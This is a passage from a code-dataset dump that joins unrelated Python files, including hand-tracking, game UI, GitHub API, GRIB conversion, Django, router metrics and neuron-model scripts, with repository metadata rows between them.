                self.lmList.append([id, cx, cy])
                if draw:
                    cv2.circle(img, (cx, cy), 5, (255, 0, 255), cv2.FILLED)
            xmin, xmax = min(xList), max(xList)
            ymin, ymax = min(yList), max(yList)
            bbox = xmin, ymin, xmax, ymax
            if draw:
                # Bounding box padded by 20 px on each side.
                cv2.rectangle(img, (bbox[0] - 20, bbox[1] - 20),
                              (bbox[2] + 20, bbox[3] + 20), (0, 255, 0), 2)
        return self.lmList, bbox
    def fingersUp(self):
        """Return a list of five 0/1 flags, one per finger, 1 = extended.

        Requires a prior successful findPosition call (reads self.lmList).
        """
        fingers = []
        # Thumb
        # NOTE(review): the thumb uses an x-coordinate comparison, which
        # presumably assumes a specific hand/orientation facing the camera -
        # confirm behavior for the other hand before relying on it.
        if self.lmList[self.tipIds[0]][1] > self.lmList[self.tipIds[0] - 1][1]:
            fingers.append(1)
        else:
            fingers.append(0)
        # 4 Fingers
        # A finger counts as up when its tip is above (smaller y than) the
        # joint two landmarks below it.
        for id in range(1, 5):
            if self.lmList[self.tipIds[id]][2] < self.lmList[self.tipIds[id] - 2][2]:
                fingers.append(1)
            else:
                fingers.append(0)
        return fingers
    def findDistance(self, p1, p2, img, draw=True):
        """Euclidean pixel distance between landmarks p1 and p2.

        Returns (length, img, [x1, y1, x2, y2, cx, cy]) where (cx, cy) is the
        midpoint; optionally draws the two points, the connecting line and
        the midpoint on img.
        """
        x1, y1 = self.lmList[p1][1], self.lmList[p1][2]
        x2, y2 = self.lmList[p2][1], self.lmList[p2][2]
        cx, cy = (x1 + x2) // 2, (y1 + y2) // 2
        if draw:
            cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)
            cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)
            cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)
            cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)
        length = math.hypot(x2 - x1, y2 - y1)
        return length, img, [x1, y1, x2, y2, cx, cy]
def main():
    """Webcam demo: track a hand, print the thumb-tip landmark, overlay FPS.

    Requires an attached camera (device index 1) and a GUI environment;
    runs until the process is terminated.
    """
    pTime = 0  # timestamp of the previous frame, for FPS computation
    cap = cv2.VideoCapture(1)
    detector = handDetector()
    while True:
        success, img = cap.read()
        if not success:
            # Camera read failed (device missing or busy): stop instead of
            # passing an invalid frame to the detector.
            break
        img = detector.findHands(img)
        # Bug fix: findPosition returns a (landmark_list, bbox) tuple.  The
        # original bound the whole tuple to lmList, so len(lmList) was always
        # 2 and lmList[4] raised IndexError instead of printing landmark #4.
        lmList, bbox = detector.findPosition(img)
        if len(lmList) != 0:
            print(lmList[4])  # landmark 4 = thumb tip: [id, x_px, y_px]
        cTime = time.time()
        fps = 1 / (cTime - pTime)
        pTime = cTime
        cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3,
                    (255, 0, 255), 3)
        cv2.imshow("Image", img)
        cv2.waitKey(1)
if __name__ == "__main__":
    main()
"badalmishradev@gmail.com"
] | badalmishradev@gmail.com |
159e01e7c2fe4f3943abf29f49cebe1232f215b3 | 53784d3746eccb6d8fca540be9087a12f3713d1c | /res/packages/scripts/scripts/client/gui/Scaleform/daapi/view/meta/VehiclePreviewMeta.py | 3b324dcf456ad95c0dd3471a225ee52f30dbbf10 | [] | no_license | webiumsk/WOT-0.9.17.1-CT | 736666d53cbd0da6745b970e90a8bac6ea80813d | d7c3cf340ae40318933e7205bf9a17c7e53bac52 | refs/heads/master | 2021-01-09T06:00:33.898009 | 2017-02-03T21:40:17 | 2017-02-03T21:40:17 | 80,870,824 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 2,046 | py | # 2017.02.03 21:51:10 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/VehiclePreviewMeta.py
from gui.Scaleform.framework.entities.View import View
class VehiclePreviewMeta(View):
    """
    DO NOT MODIFY!
    Generated with yaml.
    __author__ = 'yaml_processor'
    @extends View
    """
    # Event stubs invoked from ActionScript; concrete views are expected to
    # override them (the base implementation only logs an override error).
    def closeView(self):
        self._printOverrideError('closeView')
    def onBackClick(self):
        self._printOverrideError('onBackClick')
    def onBuyOrResearchClick(self):
        self._printOverrideError('onBuyOrResearchClick')
    def onOpenInfoTab(self, index):
        self._printOverrideError('onOpenInfoTab')
    def onCompareClick(self):
        self._printOverrideError('onCompareClick')
    # as_*S methods push data to the Flash side; each is a no-op (returns
    # None) until the DAAPI bridge has been initialised.
    def as_setStaticDataS(self, data):
        """
        :param data: Represented by VehPreviewStaticDataVO (AS)
        """
        if self._isDAAPIInited():
            return self.flashObject.as_setStaticData(data)
    def as_updateInfoDataS(self, data):
        """
        :param data: Represented by VehPreviewInfoPanelVO (AS)
        """
        if self._isDAAPIInited():
            return self.flashObject.as_updateInfoData(data)
    def as_updateVehicleStatusS(self, status):
        if self._isDAAPIInited():
            return self.flashObject.as_updateVehicleStatus(status)
    def as_updatePriceS(self, data):
        """
        :param data: Represented by VehPreviewPriceDataVO (AS)
        """
        if self._isDAAPIInited():
            return self.flashObject.as_updatePrice(data)
    def as_updateBuyButtonS(self, data):
        """
        :param data: Represented by VehPreviewBuyButtonVO (AS)
        """
        if self._isDAAPIInited():
            return self.flashObject.as_updateBuyButton(data)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\daapi\view\meta\VehiclePreviewMeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:51:10 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
0ac14a8d24cb5d63875837fa4d9df2a7b1f8b5c6 | 86741e9f531f2aa63af682cc974ebbcc3b202e90 | /allhub/users/ssh_keys.py | 5829881dbdcb9d0302a4e6deb02739cf3e27ca79 | [
"Apache-2.0"
] | permissive | srinivasreddy/allhub | ccebea96a106e266743d180410ab5b16d08946fe | ff20858c9984da5c4edd5043c39eed3b6d5d693d | refs/heads/master | 2022-12-27T01:24:30.759553 | 2021-06-04T11:38:16 | 2021-06-04T11:38:16 | 204,402,796 | 2 | 2 | Apache-2.0 | 2022-12-08T07:44:11 | 2019-08-26T05:33:37 | Python | UTF-8 | Python | false | false | 1,817 | py | from allhub.response import Response
class SSHKeysMixin:
    """GitHub API calls for managing public SSH keys.

    The host class is expected to provide the HTTP verb helpers
    ``get``/``post``/``delete``; responses are decoded through ``Response``.
    Every endpoint requires the same preview media type, so it is defined
    once below instead of being repeated inline in each method.
    """
    # Accept header required by GitHub's preview API for SSH-key endpoints.
    _ACCEPT = {"Accept": "application/vnd.github.giant-sentry-fist-preview+json"}
    def list_public_ssh_keys(self, username):
        """List the verified public SSH keys of ``username``."""
        url = "/users/{username}/keys".format(username=username)
        self.response = Response(self.get(url, **self._ACCEPT), "SSHKeys")
        return self.response.transform()
    def ssh_keys(self):
        """List the authenticated user's SSH keys."""
        self.response = Response(self.get("/user/keys", **self._ACCEPT), "SSHKeys")
        return self.response.transform()
    def ssh_key(self, key_id):
        """Fetch a single SSH key of the authenticated user by ``key_id``."""
        url = "/user/keys/{key_id}".format(key_id=key_id)
        self.response = Response(self.get(url, **self._ACCEPT), "SSHKey")
        return self.response.transform()
    def create_public_ssh_key(self, title, key):
        """Create a public SSH key with the given ``title`` and key material."""
        self.response = Response(
            self.post("/user/keys", params=[("title", title), ("key", key)], **self._ACCEPT),
            "SSHKey",
        )
        return self.response.transform()
    def delete_public_ssh_key(self, key_id):
        """Delete key ``key_id``; True when the API answers 204 No Content."""
        url = "/user/keys/{key_id}".format(key_id=key_id)
        self.response = Response(self.delete(url, **self._ACCEPT), "")
        return self.response.status_code == 204
| [
"thatiparthysreenivas@gmail.com"
] | thatiparthysreenivas@gmail.com |
6700ce49e60619ee0fb43f9763634b80fea881da | 8cc9cd57502d7b05e7efab28f1a67e49f3880435 | /bin/emacs-pylint.py | c820de6afb0b234d35a9e15f0f0ea2a228b48997 | [
"MIT"
] | permissive | mrflip/dotfiles | 271483b50a2d622bd763c9548e834c10ab5571c7 | 50ad0da829f7734dbda5a7ab79638a1dae647fec | refs/heads/master | 2020-12-25T09:48:17.086879 | 2020-07-27T04:18:58 | 2020-07-27T04:18:58 | 45,720 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | #!/usr/bin/env python
import re
import sys
from subprocess import *
# Run pylint over the file named on the command line and rewrite its
# machine-readable "[W, func]" / "[E]" markers into "Warning (func):" /
# "Error:" prefixes that Emacs' compilation mode can parse.
# NOTE(review): the filename is interpolated into a shell=True command
# string, so a path containing shell metacharacters would be expanded by
# the shell - confirm whether callers guarantee safe paths.
p = Popen("pylint -f parseable -r n --disable-msg-cat=C,R %s" %
          sys.argv[1], shell = True, stdout = PIPE).stdout
for line in p:
    # Marker looks like "[W]", "[E]" or "[W, some_function]".
    match = re.search("\\[([WE])(, (.+?))?\\]", line)
    if match:
        kind = match.group(1)
        func = match.group(3)
        if kind == "W":
            msg = "Warning"
        else:
            msg = "Error"
        if func:
            line = re.sub("\\[([WE])(, (.+?))?\\]", "%s (%s):" % (msg, func), line)
        else:
            line = re.sub("\\[([WE])?\\]", "%s:" % msg, line)
        print line,
p.close()
| [
"doncarlo@silverback.local"
] | doncarlo@silverback.local |
78a6927b9d7a4ea485f4cff1587b6097a2e634ee | 461da7a58c559c8710972c2ed3e34f558bf5d77d | /dmic/grib2nc.py | 441b5962c0427363b5c7584ec4f38ea2713fa647 | [
"MIT"
] | permissive | khintz/dmic | 94ce46daaa05552094480e573be60a43dbe15022 | 147a307d89c22f9ed335a7c617e668194e13257e | refs/heads/master | 2022-12-24T15:43:02.790499 | 2020-10-01T19:55:17 | 2020-10-01T19:55:17 | 300,038,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,111 | py | import sys
import os
import dmit
import xarray as xr
import configparser
import netCDF4 as nc
import numpy as np
import grib
import logging
log = logging.getLogger("dmic.log")
log.setLevel(logging.DEBUG)
# Presence flags for the supported output fields.
# NOTE(review): these module-level defaults are shadowed by local assignments
# inside convert.__init__, so they are never actually read there.
b_t2m = False
b_u10 = False
b_v10 = False
class convert:
    """Convert a surface-level GRIB file to a compressed NetCDF file.

    Only ``leveltype == 'sf'`` (surface fields) is implemented.  Of the
    decoded dataset, 2 m air temperature and the 10 m wind components are
    written out when present.
    """

    def __init__(self, gribfile, leveltype, outfile):
        # gribfile:  path to the input GRIB file
        # leveltype: level-type selector; only 'sf' is supported
        # outfile:   path of the NetCDF file to create
        # The whole conversion runs at construction time.
        if leveltype=='sf':
            ini_grib = grib.cf_grib_definitions.gribparameter2cfnaming_sf
        else:
            log.error('Sorry! But '+leveltype+' is not implemented yet')
            log.error('Possible options for --leveltype is: sf\n exiting')
            sys.exit(0)
        # Call object
        grib_reader = grib.read(leveltype)
        # Get coordinates
        lats, lons, latdim, londim = grib_reader.get_grid(gribfile)
        # we have to divide calls to grib_reader.read() between same parameter, multiple levels OR
        # multiple parameters, same level.
        # Group requested parameters by level: grib_dic[level][param] = cf name.
        grib_dic = {}
        for key in ini_grib:
            keylist = key.split('_')
            lvl = str(keylist[1])
            if lvl not in grib_dic.keys():
                grib_dic[lvl] = {}
            grib_dic[lvl][key] = ini_grib[key]
        # This works but creates NaN for all values with missing level (eg parid 33 does not have values at level 2)
        i=0
        for key in grib_dic.keys():
            ds_grib = grib_reader.read(gribfile, leveltype, grib_dic[key])
            # if i==0: ds = ds_grib
            # if i>0: ds = xr.merge([x, ds_grib])
            # x = ds_grib
            i+=1
        # NOTE(review): only the dataset read in the LAST loop iteration is
        # inspected below -- presumably intentional while the merge above is
        # commented out, but worth confirming.
        coord_names = list(ds_grib.coords)
        dim_names = list(ds_grib.dims)
        var_names = list(ds_grib.data_vars)
        k=0
        for var in var_names:
            level = ds_grib[var].coords['level'].values[0]
            if var == 'air_temperature' and level==2:
                b_t2m = True
                t2m = np.array(ds_grib[var].values, dtype=np.float32)
            if var == 'eastward_wind' and level==10:
                b_u10 = True
                u10 = np.array(ds_grib[var].values, dtype=np.float32)
            if var == 'northward_wind' and level==10:
                b_v10 = True
                v10 = np.array(ds_grib[var].values, dtype=np.float32)
            k+=1
        # NOTE(review): the assignments above make b_t2m/b_u10/b_v10 LOCAL to
        # __init__ (the module-level defaults are shadowed, not read).  If a
        # field is absent from the file, the "if b_t2m:" tests below raise
        # UnboundLocalError instead of falling back to False.  Initialise the
        # three flags to False at the top of this method to fix.
        ncf = nc.Dataset(outfile,'w')
        ncdim_time = ncf.createDimension("time", None)
        ncdim_lat = ncf.createDimension("latitude", latdim)
        ncdim_lon = ncf.createDimension("longitude", londim)
        # 'f4' = float (ordinary, bot python float which is 64bit)
        # 'i4' = "i4" represents a 32 bit integer
        if b_t2m:
            ncvar_t2m = ncf.createVariable('air_temperature_2m', 'f4', ('time','latitude','longitude'), zlib=True)
            ncvar_t2m[:,:,:] = t2m[:,0,:,:]
            ncvar_t2m.units = 'K'
            ncvar_t2m.long_name = 'air_temperature_2m'
        if b_u10:
            ncvar_u10 = ncf.createVariable('eastward_wind_10m', 'f4', ('time','latitude','longitude'), zlib=True)
            ncvar_u10[:,:,:] = u10[:,0,:,:]
            ncvar_u10.units = 'm/s'
            ncvar_u10.long_name = 'eastward_wind_10m'
        if b_v10:
            ncvar_v10 = ncf.createVariable('nortward_wind_10m', 'f4', ('time','latitude','longitude'), zlib=True)
            ncvar_v10[:,:,:] = v10[:,0,:,:]
            ncvar_v10.units = 'm/s'
            ncvar_v10.long_name = 'nortward_wind_10m'
        ncf.close()
        # ds.to_netcdf(outfile)
        # Read gribfile
        # ds_grib = grib_reader.read(gribfile, leveltype, grib_dic)
        # print(ds_grib)
        # i = 0
        # for key in grib_dic.keys():
        #     ds_grib = grib_reader.read(gribfile, leveltype, grib_dic[key])
        #     ds_grib.to_netcdf(outfile+'.'+str(i))
        #     i+=1
        # if i==0: # For first iteration we create the netcdf file
        #     ncf = nc.Dataset('out.nc','w')
        #     ncdim_time = ncf.createDimension("TIME", None)
        return
| [
"kasperhintz@gmail.com"
] | kasperhintz@gmail.com |
e08f516bcebbb47311c2d452292f7c848b0dbe99 | 475ddb908382a253fcfe14b0ccb74b6bd18493eb | /aui/migrations/0001_initial.py | 9f3393cbf6352b31a34f3199d51e87778950ac63 | [] | no_license | malayparmar8991/DRF-Task | 0c77b324f6862d40d7e6164e322d424083496ea3 | 03f1604eb3b281430eb897c80d8a0cd874a4adae | refs/heads/main | 2023-02-05T18:30:15.061473 | 2020-12-24T09:38:52 | 2020-12-24T09:38:52 | 324,116,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 3.1.4 on 2020-12-23 21:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Users`` table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Users',
            fields=[
                # NOTE(review): no auto "id" column is generated -- the
                # Aadhar_Number field below is declared as the primary key.
                ('user_id', models.CharField(default=0, max_length=10, unique=True)),
                ('Aadhar_Number', models.IntegerField(default=0, primary_key=True, serialize=False, unique=True)),
                ('Is_Active', models.BooleanField()),
                ('street', models.CharField(max_length=100, null=True)),
                ('city', models.CharField(max_length=10, null=True)),
                ('state', models.CharField(max_length=10, null=True)),
                ('Postal_Code', models.IntegerField(null=True)),
                ('School_or_College_name', models.CharField(max_length=100)),
                ('Year_of_Passing', models.IntegerField()),
                ('percentage', models.FloatField()),
                ('Account_Number', models.IntegerField()),
                ('Bank_Name', models.CharField(max_length=100)),
                ('IFSC_Code', models.IntegerField(unique=True)),
                ('Full_Name', models.CharField(max_length=100)),
                ('Date_of_birth', models.DateField()),
                ('Blood_Group', models.CharField(max_length=100)),
                ('Contact_Number_1', models.IntegerField()),
                ('Contact_Number_2', models.IntegerField(blank=True, null=True)),
                ('Email_ID_1', models.EmailField(max_length=254)),
                ('Email_ID_2', models.EmailField(blank=True, max_length=254, null=True)),
                ('Company_Name', models.CharField(max_length=100)),
                ('Job_Role', models.CharField(max_length=100)),
                ('Work_Experience_in_Years', models.IntegerField()),
            ],
        ),
    ]
| [
"parmarmalay8991@gmail.com"
] | parmarmalay8991@gmail.com |
d482c06463915558c4276198ec9aa13a4222ad08 | d59913246a2faa24779daf6713a863ee4319ddba | /flappyBird.py | dbd4e55c0ac50fd2d827d3976cbc39001df6d15f | [] | no_license | andypro22/Asteroids | 184ebd7f8d7a30ff4f30f3e9bfd79fda20547a4e | 5ef4fbdc85b2963fd7e2a7e96eb151e8dd1258e5 | refs/heads/main | 2023-06-27T07:12:25.910216 | 2021-07-29T09:18:02 | 2021-07-29T09:18:02 | 390,663,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # Importing the extensions
import pygame

# Initializing the pygame
pygame.init()

# Creating the screen
screen = pygame.display.set_mode((800, 600))

# Title and Icon
pygame.display.set_caption('Asteroids')
# NOTE(review): the icon path is empty, so pygame.image.load('') raises at
# startup; the loaded surface is also never passed to
# pygame.display.set_icon(), so no icon would be applied even if it loaded.
icon = pygame.image.load('')

# Game Loop: process events until the window is closed.
running = True
while running:

    # Events
    for event in pygame.event.get():

        # Quitting
        if event.type == pygame.QUIT:
            running = False
| [
"andyngpro22@gmail.com"
] | andyngpro22@gmail.com |
0b2aa37456c58d7cc431f4a0878d8f13aa3afdaf | 7254b888214be18434ec20ff8f1f734ee56dcc44 | /keentic_influxdb_exporter.py | f1569752c51be1a2df1562aba7f434cc9fb3a29a | [] | no_license | easterism/keenetic-grafana-monitoring | 4c5ba9eda6d1ab6df63280512627d9cec2e08bb8 | 16e3c37bf8c5531439faf1033c762c24993bb2c8 | refs/heads/master | 2022-11-30T14:16:08.348802 | 2020-08-03T16:26:24 | 2020-08-03T16:26:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,196 | py | import json
import os
import time
import urllib
import requests
from jsonpath_rw import parse
from influxdb_writter import InfuxWritter
from value_normalizer import normalize_value
def json_path_init(paths):
    """Pre-compile a mapping of JSONPath expressions.

    Values equal to "~" are kept verbatim (the collector treats "~" as
    "use the key of the matched element"); every other value is compiled
    with jsonpath_rw's ``parse``.
    """
    return {
        name: expr if expr == "~" else parse(expr)
        for name, expr in paths.items()
    }
class KeeneticCollector(object):
    """Polls one ``show <command>`` endpoint of a Keenetic router and writes
    the resulting points to InfluxDB.

    The JSON response is decomposed with pre-compiled JSONPath queries from
    the metric configuration: ``root`` selects the repeated elements, while
    ``tags`` / ``values`` extract tag and field values from each element.
    """

    def __init__(self, infuxdb_writter, endpoint, metric_configration):
        # infuxdb_writter:     InfuxWritter used to persist collected points
        # endpoint:            base URL of the router's REST interface
        # metric_configration: one entry of the "metrics" list in config/metrics.json
        self._influx = infuxdb_writter
        self._endpoint = endpoint
        self._command = metric_configration['command']
        self._params = metric_configration.get('param', {})
        self._root = parse(metric_configration['root'])
        self._tags = json_path_init(metric_configration['tags'])
        self._values = json_path_init(metric_configration['values'])

    def collect(self):
        """Query the router once, build points, and write them to InfluxDB.

        Also appends a "collector" point recording how long (in ns) this
        collection pass took.
        """
        query = urllib.parse.urlencode(self._params)
        url = '{}/show/{}?{}'.format(self._endpoint, self._command.replace(' ', '/'), query)
        response = json.loads(requests.get(url).content.decode('UTF-8'))
        roots = self._root.find(response)
        metrics = []
        start_time = time.time_ns()
        for root in roots:
            tags = self._params.copy()
            values = {}
            for tagName, tagPath in self._tags.items():
                if tagPath == '~':
                    # "~" means: use the key of the matched element as the tag value.
                    tags[tagName] = root.path.fields[0]
                else:
                    tags[tagName] = self.get_first_value(tagPath.find(root.value))
            for valueName, valuePath in self._values.items():
                value = self.get_first_value(valuePath.find(root.value))
                if value is not None:
                    values[valueName] = normalize_value(value)
            # Skip elements that yielded no fields at all.
            if not values:
                continue
            metrics.append(self.create_metric(self._command, tags, values))
        metrics.append(
            self.create_metric("collector", {"command": self._command}, {"duration": (time.time_ns() - start_time)}))
        # BUG FIX: previously this wrote through the module-level global
        # ``infuxdb_writter`` (defined only when run as a script) instead of
        # the writer injected via __init__, breaking any non-script use.
        self._influx.write_metrics(metrics)

    @staticmethod
    def create_metric(measurement, tags, values):
        """Build a single InfluxDB point stamped with the current time (ns)."""
        return {
            "measurement": measurement,
            "tags": tags,
            "time": time.time_ns(),
            "fields": values
        }

    @staticmethod
    def get_first_value(array):
        """Return the value of the first JSONPath match, or None if there is none."""
        if array:
            return array[0].value
        return None
if __name__ == '__main__':
    # Banner, then load the metric definitions and the InfluxDB connection
    # settings from the "config" directory next to this script.
    print(
        " _ __ _ _ _____ _ _ _ \n | |/ / | | (_) / ____| | | | | | \n | ' / ___ ___ _ __ ___| |_ _ ___ | | ___ | | | ___ ___| |_ ___ _ __ \n | < / _ \/ _ \ '_ \ / _ \ __| |/ __| | | / _ \| | |/ _ \/ __| __/ _ \| '__|\n | . \ __/ __/ | | | __/ |_| | (__ | |___| (_) | | | __/ (__| || (_) | | \n |_|\_\___|\___|_| |_|\___|\__|_|\___| \_____\___/|_|_|\___|\___|\__\___/|_| \n \n ")
    metrics_configuration = json.load(open(os.path.dirname(os.path.realpath(__file__)) + "/config/metrics.json", "r"))
    influx_configuration = json.load(open(os.path.dirname(os.path.realpath(__file__)) + "/config/influx.json", "r"))
    endpoint = metrics_configuration['endpoint']
    metrics = metrics_configuration['metrics']
    collectors = []
    infuxdb_writter = InfuxWritter(influx_configuration)
    print("Connecting to router: " + endpoint)
    # One collector per configured metric/command.
    for metric_configuration in metrics:
        print("Configuring metric: " + metric_configuration['command'])
        collectors.append(KeeneticCollector(infuxdb_writter, endpoint, metric_configuration))
    print("Configuration done. Start collecting with interval: " + str(metrics_configuration['interval_sec']) + " sec")
    # Poll forever at the configured interval (no shutdown handling).
    while True:
        for collector in collectors: collector.collect()
        time.sleep(metrics_configuration['interval_sec'])
| [
"vitalikis1@gmail.com"
] | vitalikis1@gmail.com |
e0159a0bc43cebe51ee88486e5e5cacadec5a5a7 | 9edaf93c833ba90ae9a903aa3c44c407a7e55198 | /netex/models/railway_link_ref_structure.py | 00ba98f8df1e4547deb46e2b051c3da101b80055 | [] | no_license | tefra/xsdata-samples | c50aab4828b8c7c4448dbdab9c67d1ebc519e292 | ef027fe02e6a075d8ed676c86a80e9647d944571 | refs/heads/main | 2023-08-14T10:31:12.152696 | 2023-07-25T18:01:22 | 2023-07-25T18:01:22 | 222,543,692 | 6 | 1 | null | 2023-06-25T07:21:04 | 2019-11-18T21:00:37 | Python | UTF-8 | Python | false | false | 246 | py | from dataclasses import dataclass
from .infrastructure_link_ref_structure import InfrastructureLinkRefStructure
__NAMESPACE__ = "http://www.netex.org.uk/netex"
@dataclass
class RailwayLinkRefStructure(InfrastructureLinkRefStructure):
    # Marker subclass generated from the NeTEx XSD: a reference to a railway
    # link.  All fields and behaviour are inherited from
    # InfrastructureLinkRefStructure; only the element name differs.
    pass
| [
"chris@komposta.net"
] | chris@komposta.net |
f0b8215f223b8f5f0e4e37e04cf9da5319bc58df | 86d13acd9daa4c86384306f19247bbc49a903302 | /run.py | 1190fb251aa7e2a2244485758b35f99deb01168e | [] | no_license | Aaronator1/microblog3 | 2dfa2ab8ef2dc6f6d848cef954c538514c88d8ae | 12c3682f230b14a7117c184463034bf288204c7b | refs/heads/master | 2016-09-01T15:31:54.779725 | 2015-11-27T22:08:36 | 2015-11-27T22:08:36 | 46,994,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __author__ = 'aaronmsmith'
#!flask/bin/python
from app import app
app.run(debug=True)
| [
"aaron.smith@healthways.com"
] | aaron.smith@healthways.com |
b18f821ccaffcada21e37d3d9d6043914b8a0290 | 5f0fed47f9dd3d918eb5f32f7b7d55097762c522 | /findMiddleElement.py | dca42e660a2f22cedebd6d1007dd83b328170cef | [] | no_license | NoisNette/Codesignal-solutions | 20431c3ebb3f38eed2f6b20a001824c96c0dff23 | 496c4ec9e6f334c07358df3257d3a85285488053 | refs/heads/master | 2021-05-24T12:11:59.578709 | 2021-02-05T15:55:32 | 2021-02-05T15:55:32 | 253,553,945 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | def findMiddleElement(l):
l1 = []
while l!=None:
l1.append(l.value)
l = l.next
return l1[len(l1)//2]
| [
"noreply@github.com"
] | NoisNette.noreply@github.com |
ec926de0354a852e7beb4470bfacb19eed09d694 | f93ce0ace9cdfd117d5b725626f4b808f2e26c23 | /python3/sys-module/f5.py | 3695587fa8c405c15e841a1928b106a18a46a63d | [] | no_license | DhritiShikhar/my-code | 90be74a5d74c3cea20324b481972da4e4c4e585d | ded31babce1b3c1eb7699c70a81a6fe50c60c6bb | refs/heads/master | 2021-01-20T08:00:17.792809 | 2015-06-10T16:37:12 | 2015-06-10T16:37:12 | 37,109,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | #!/usr/bin/python3
import sys
from contextlib import redirect_stdout

# Demonstrate stdout redirection: everything printed inside the with-block
# goes to the file "test" instead of the console.
# Using context managers fixes two defects of the manual save/restore version:
# if print() raised, sys.stdout was never restored and the file never closed.
with open("test", "w") as my_file, redirect_stdout(my_file):
    print("This line goes to my_file")
| [
"dhrish20@gmail.com"
] | dhrish20@gmail.com |
6d608921210b60fa6848d362d756532953b5c228 | 2b770588db83bc2a61b52f430248414395cc1b1f | /django_/citysearch_project/cities/models.py | fa4d0dc5e09ad2f0c02245c2ca01b266a2024625 | [] | no_license | luka319/portfelio_chemodanio | 595afb1d2e1fb3564bf94b204aa8e63dddd4cf0c | dd37f8c4af9d043ace9b5438b5a7680cfab26ab2 | refs/heads/master | 2021-06-26T19:05:33.170977 | 2020-01-08T23:24:10 | 2020-01-08T23:24:10 | 231,444,932 | 0 | 0 | null | 2021-06-10T22:27:34 | 2020-01-02T19:19:49 | Python | UTF-8 | Python | false | false | 296 | py | from django.db import models
# Create your models here.
class City(models.Model):
name = models.CharField(max_length = 255)
state = models.CharField(max_length = 255)
class Meta:
verbose_name_plural = "cities_города"
def __str__(self):
return self.name
| [
"luka319@i.ua"
] | luka319@i.ua |
984cd002eab77602f376c87e7f320dc1d8d297fb | c79226a0b149150072a5eb3037a3859ca7df937f | /cells/FS_LIP_altd.py | 27b30c3056511f8defe03f1233f44740f5839794 | [
"MIT"
] | permissive | benpolletta/egly-driver-network | e880c2161635a556d7324f5ca2c137bbf4dbcd8a | cff36a857e22358d122f24fb0100be26483a3caf | refs/heads/main | 2023-04-12T13:28:46.106592 | 2021-04-06T15:58:09 | 2021-04-06T16:03:12 | 355,248,088 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | # -*- coding: utf-8 -*-
from brian2 import *
defaultclock.dt = 0.01*ms
# Brian2 equation string for a fast-spiking (FS) LIP interneuron: membrane
# potential driven by Hodgkin-Huxley-style leak/Na/K currents plus synaptic,
# gap-junction, noise and rhythmically modulated external input terms.
# The string is model code -- it must not be edited for formatting.
eq_FS_LIP='''
dV/dt=1/C_FS*(-J-Isyn-Igap-Iran-Iapp-IL-INa-IK) : volt
J : amp * meter ** -2
Isyn=IsynRS_LIP_sup+IsynFS_LIP_sup+IsynSI_LIP_sup+IsynRS_LIP_gran+IsynFS_LIP_gran+IsynIB_LIP+IsynSI_LIP_deep+Isyn_FEF+Isyn_mdPul : amp * meter ** -2
IsynRS_LIP_sup : amp * meter ** -2
IsynFS_LIP_sup : amp * meter ** -2
IsynSI_LIP_sup : amp * meter ** -2
IsynRS_LIP_gran : amp * meter ** -2
IsynFS_LIP_gran : amp * meter ** -2
IsynIB_LIP : amp * meter ** -2
IsynSI_LIP_deep : amp * meter ** -2
Isyn_FEF : amp * meter ** -2
Isyn_mdPul : amp * meter ** -2
Igap : amp * meter ** -2
IL=gL_FS*(V-VL_FS) : amp * meter ** -2
INa=gNa_FS*m0**3*h*(V-VNa_FS) : amp * meter ** -2
m0=1/(1+exp((-V-38*mV)/10/mV)) : 1
dh/dt=1/tauh*(hinf-h) : 1
hinf=1/(1+exp((V+58.3*mV)/6.7/mV)) : 1
tauh=0.225*ms+1.125*ms/(1+exp((V+37*mV)/15/mV)) : second
IK=gK_FS*m**4*(V-VK_FS) : amp * meter ** -2
dm/dt=1/taum*(minf-m) : 1
minf=1/(1+exp((-V-27*mV)/11.5/mV)) : 1
taum=0.25*ms+4.35*ms*exp(-abs(V+10*mV)/10/mV) : second
Iran=sig_ranFS*randn(): amp * meter ** -2 (constant over dt)
Iapp=sinp*ginp_FS*(V-Vrev_inp) : amp * meter ** -2
dsinp/dt=-sinp/taudinp + (1-sinp)/taurinp*0.5*(1+tanh(Vinp/10/mV)) : 1
dVinp/dt=1/tauinp*(Vlow-Vinp) : volt
ginp_FS = ginp_FS_good* (1+sin(2*pi*t*4*Hz)): siemens * meter **-2
ginp_FS_good : siemens * meter **-2
ginp_FS_bad : siemens * meter **-2
'''

##Constants :
C_FS = 0.9* ufarad * cm ** -2  # membrane capacitance
gL_FS=1 * msiemens * cm **-2  # leak conductance
VL_FS=-65*mV  # leak reversal potential
gNa_FS=200 * msiemens * cm **-2  # maximal Na conductance
VNa_FS=50*mV  # Na reversal potential
gK_FS=20 * msiemens * cm **-2  # maximal K conductance
VK_FS=-100*mV  # K reversal potential
sig_ranFS=0.05* mamp * cm **-2
# NOTE(review): the assignment below overrides the one above, halving the
# noise amplitude -- the first line is dead code; confirm which value is
# actually intended.
sig_ranFS=0.05* mamp * cm **-2*0.5
if __name__=='__main__' :
    # Stand-alone demo: simulate a single FS cell for 1 s under a constant
    # depolarising drive and plot its membrane potential.
    start_scope()
    # External-input parameters referenced by the equation string; the input
    # conductances are zeroed so only the constant drive J is active.
